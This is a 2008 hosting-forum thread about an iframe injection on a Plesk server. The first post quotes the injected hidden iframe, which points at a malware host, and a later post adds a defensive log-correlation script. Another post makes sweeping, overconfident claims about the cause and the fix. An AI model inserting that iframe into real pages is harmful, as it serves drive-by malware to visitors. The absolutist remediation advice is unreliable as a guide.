
iframe exploit - ISC Sans iframeDOLLARS.com

Discussion in 'Plesk for Linux - 8.x and Older' started by raaqi, Feb 29, 2008.

  1. raaqi (Guest)

    Hi Guys,

    Had iframedollars.com exploit my server today. In the logwatch was this:

    Requests with error response codes
    400 Bad Request
    /w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)

    Several sites had the injection which looked like this in all index.html, htm, php files etc.

    <iframe src= http://58.65.232.33/counter.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

    I'm not sure how this exploit occurred. I've looked through logs & can't figure it out. Anyone know where i should be looking?
     
  2. atomicturtle (Golden Pleskian, Washington, DC)

    It could be through either a vulnerable application on the site, or a compromised user account. I would start by looking at the timestamp on the file(s) modified, then cross reference that against your ftp and http logs to see what was going on with that account/domain at the time.
     
  3. raaqi (Guest)

    I replaced the files on most of the accounts, except for one (so I could trace it back). This site's domain does not resolve to my server. It has no current access logs or xferlogs, which means the exploit came through another website and managed to modify other sites on the box. No idea..
     
  4. atomicturtle (Golden Pleskian, Washington, DC)

    If that is the case, then they likely have compromised the system completely. I would start investigating all the files that changed around that time on the system. Also, I just put out updates to chkrootkit (0.48) and rkhunter (1.3.2) in my archive; you should check those out as well. I've started a basic forensic procedure here:
    http://www.atomicorp.com/wiki/index.php/Compromised_System
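The check described in posts 2 and 4 (take the mtime of each injected file, then cross-reference it against the FTP and HTTP logs for that domain, and flag files with no matching activity) automated as a small triage script. This is an added example, not code from the thread, from Plesk or from the atomicorp wiki. It assumes the wu-ftpd/proftpd xferlog line format and the Apache combined access-log format; the vhost tree, log lines, usernames and addresses it builds are constructed for the example, and the `build_sample`, `find_injected`, `correlate` and `triage` names are mine.

```python
"""Triage helper for the iframe-injection case in this thread: find web files that
carry the injected marker, take each file's mtime, and look for FTP uploads
(xferlog) or HTTP POST/PUT requests (Apache access log) within a window around
that time. The vhost tree and the log lines below are constructed sample data."""
import os
import re
import tempfile
from datetime import datetime, timedelta

INJECTED_HOST = "58.65.232.33"                  # host from the iframe quoted in post 1
WEB_EXTENSIONS = (".html", ".htm", ".php")
# xferlog: "Fri Feb 29 03:14:05 2008 1 203.0.113.9 4123 /path a _ i r user ftp 0 * c"
# fields after the path: type, flag, direction (i=upload, o=download), mode, user, ...
XFERLOG_RE = re.compile(
    r"^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \d+ (?P<ip>\S+) \d+ (?P<path>\S+) "
    r"\S \S (?P<dir>[io]) \S (?P<user>\S+) \S+ \S+ \S+ \S$")
# Apache combined log; only the fields the correlation needs are captured
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>\S+) [^\]]*\] "(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')


def find_injected(root, marker=INJECTED_HOST):
    """Walk root and return [(path, mtime)] for web files containing marker, oldest first."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    if marker.encode() not in fh.read():
                        continue
            except OSError:
                continue
            hits.append((path, datetime.fromtimestamp(os.path.getmtime(path))))
    return sorted(hits, key=lambda h: h[1])


def parse_xferlog(lines):
    out = []
    for line in lines:
        m = XFERLOG_RE.match(line.strip())
        if m:  # collapse the padded day field before parsing the timestamp
            ts = datetime.strptime(" ".join(m["ts"].split()), "%a %b %d %H:%M:%S %Y")
            out.append({"time": ts, "ip": m["ip"], "path": m["path"], "dir": m["dir"], "user": m["user"]})
    return out


def parse_access_log(lines):
    out = []
    for line in lines:
        m = ACCESS_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S")
            out.append({"time": ts, "ip": m["ip"], "method": m["method"], "url": m["url"], "status": m["status"]})
    return out


def correlate(injected, ftp_entries, http_entries, window_min=10):
    """Per injected file: FTP uploads of that exact path and HTTP write-type requests
    (POST/PUT) within +/- window_min of the file's mtime. Empty lists mean the write
    did not come through that account's FTP or web front door."""
    win = timedelta(minutes=window_min)
    report = {}
    for path, mtime in injected:
        report[path] = {
            "mtime": mtime,
            "ftp": [e for e in ftp_entries if e["dir"] == "i" and e["path"] == path and abs(e["time"] - mtime) <= win],
            "http": [e for e in http_entries if e["method"] in ("POST", "PUT") and abs(e["time"] - mtime) <= win],
        }
    return report


def triage(root, xferlog_lines, access_lines, window_min=10):
    return correlate(find_injected(root), parse_xferlog(xferlog_lines), parse_access_log(access_lines), window_min)


def build_sample():
    """Constructed sample (not real data): a temp vhost tree plus matching log lines."""
    root = tempfile.mkdtemp(prefix="vhosts_")
    iframe = ('<iframe src= http://58.65.232.33/counter.php frameborder="0" width="1" '
              'height="1" scrolling="no" name=counter></iframe>')
    t_upload = datetime(2008, 2, 29, 3, 14, 5)
    files = {  # relative path -> (content, mtime)
        "example.com/httpdocs/index.html": ("<html><body>hi</body></html>" + iframe, t_upload + timedelta(seconds=15)),
        "otherdomain.net/httpdocs/index.php": ("<?php echo 1; ?>" + iframe, t_upload + timedelta(seconds=57)),
        "clean.org/httpdocs/index.html": ("<html>ok</html>", t_upload - timedelta(days=30)),
    }
    for rel, (content, mtime) in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        os.utime(path, (mtime.timestamp(), mtime.timestamp()))
    hit = os.path.join(root, "example.com/httpdocs/index.html")
    fmt_ftp, fmt_http = "%a %b %d %H:%M:%S %Y", "%d/%b/%Y:%H:%M:%S"
    xferlog = [  # one upload of the hit 15 s before its mtime, one unrelated earlier download
        f"{t_upload.strftime(fmt_ftp)} 1 203.0.113.9 4123 {hit} a _ i r example_ftp ftp 0 * c",
        f"{(t_upload - timedelta(hours=5)).strftime(fmt_ftp)} 1 198.51.100.7 4000 {hit} a _ o r example_ftp ftp 0 * c",
    ]
    access = [  # a GET inside the window (not a write) and a POST well outside it
        f'203.0.113.9 - - [{(t_upload - timedelta(minutes=2)).strftime(fmt_http)} +0000] "GET /index.html HTTP/1.1" 200 812 "-" "Mozilla/4.0"',
        f'198.51.100.7 - - [{(t_upload - timedelta(hours=3)).strftime(fmt_http)} +0000] "POST /contact.php HTTP/1.1" 200 133 "-" "Mozilla/4.0"',
    ]
    return root, xferlog, access


if __name__ == "__main__":
    root, xfer, acc = build_sample()
    for path, info in triage(root, xfer, acc).items():
        print(path, info["mtime"])
        for e in info["ftp"]:
            print("  FTP upload by", e["user"], "from", e["ip"], "at", e["time"])
        for e in info["http"]:
            print("  HTTP", e["method"], e["url"], "from", e["ip"], "at", e["time"])
        if not info["ftp"] and not info["http"]:
            print("  no FTP/HTTP write activity in window: the write came from elsewhere on the box")
```

On a real box, point `find_injected` at the vhosts directory and feed it the FTP server's xferlog and the domain's Apache access log (assumed Plesk paths; check your own). In the sample, `example.com` resolves to an FTP upload by `example_ftp` just before the mtime (the leaked-credential pattern), while `otherdomain.net` shows the situation raaqi describes in post 3: an injected file with no FTP or HTTP write in the window, which means the write came through some other path on the server.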
     
  5. bandurao (Guest)

    How does this hacking take place:

    This hacking does not take place through any PHP application vulnerability, nor any kernel bug, nor any Apache bug, nor any cPanel or Plesk bug. The files of those accounts whose FTP logins have been leaked are the ones affected.

    Believe me, I have been researching this iframe and JavaScript hack for the last 10 months.

    ONLY THOSE ACCOUNTS ARE HACKED WHOSE FTP LOGIN DETAILS HAVE BEEN LEAKED AND ARE IN THE HACKER'S HANDS!

    How it's done
    This is a sophisticated operation, and the infection cycle is involved, but basically, the hacker(s) are setting up innocent-looking sites (or using previously hacked sites where the owner is usually unaware of being compromised) and loading them with expensive hacking tools like Mpack. When someone visits that site, their browser is detected and attacked (browsers affected are IE, Firefox and Opera). The visitor is unaware that they may now have a keylogger that sends the person's passwords etc. to the hacker(s), and moves on. If the innocent visitor has an FTP or root password for any internet sites, the hackers use a program that goes to the person's site(s) and instantly adds the hidden iframe to every index-type page. This is why there seems to be no indication that the site has been compromised, as the hackers already have the FTP or root passwords to log in. And since they have at least your account's FTP password, whatever permissions your folders and files are set to makes no difference.

    After they put the iframe code into that person's pages, anyone visiting that site will be redirected to the hackers' infection site, where the person's computer will be injected and infected. The hackers are depending on site owners not knowing their sites have been hacked so that the number of hacked sites will grow (as they have, starting in Italy) into the tens of thousands... Please don't think you can depend solely on your antivirus software to protect your computer. It more than likely won't help you. For $1,000, the Russian hacking bulletin boards are offering Mpack with 1 year of support and a GUARANTEE that virus programs will not catch the keyloggers. SO, keep your virus program updated, but don't depend on it completely!


    This is how this hack is spreading so fast from one computer to another, broadcasting the passwords to the hackers. During my research I even found some of the password files collected by the hack on some of the hacked servers, where they pass this password file to their tool to add the code. In some cases Google bots pick up these files and you can even find the login details of FTP accounts and server root logins in Google.

    ===============================================
    Solution:
    ===============================================


    For Server Administrators:

    If you are having this problem server-wide then the only possibility is that your root password is being used for this. Just change the password and this HACK WILL STOP.

    For individual person owning just a domain and not server:

    If you are facing this problem and your administrator says it's only your account, just change the FTP password and it will stop.

    You must have removed the code many times and it comes back again. Why???
    Because you don't change the FTP password. So change that first.

    Just changing the password is not a complete solution, but it is the first step.
    What's next: your password is leaked, which means your computer is sending out the passwords, so I would suggest you do a clean format first and then install any antivirus or antispyware which you think could block it. But the best solution is to clean-format the computer.

    Just do the two things:

    1) Change the FTP or root password of server
    2) Clean format the PC

    and take care in future that you don't visit any of the virus links made by this hack.
    Also, to keep your password secure I would suggest you use password manager software such as:

    http://keepass.info/

    This is free, open-source software.


    I can assure you this is a confirmed solution and will definitely help you all.
    Please try it, and once you have confirmed it too, please spread this message in as many forums as you can so that others also come to know how to stop it.

    Comments can be sent from:
    http://shellscripters.com/contact.htm
     
  6. ikati (Guest)

    bandurao, your home page seems to be infected. Avast caught it when I went to look at your site after reading your post.

    Do you have any ideas of how it happened, if you were changing your password?

    I've read that they pass a script by entering it in a form or some type of input; the script then has the program's permissions, which are usually the same as the owner's, and it injects the files it wants to.
     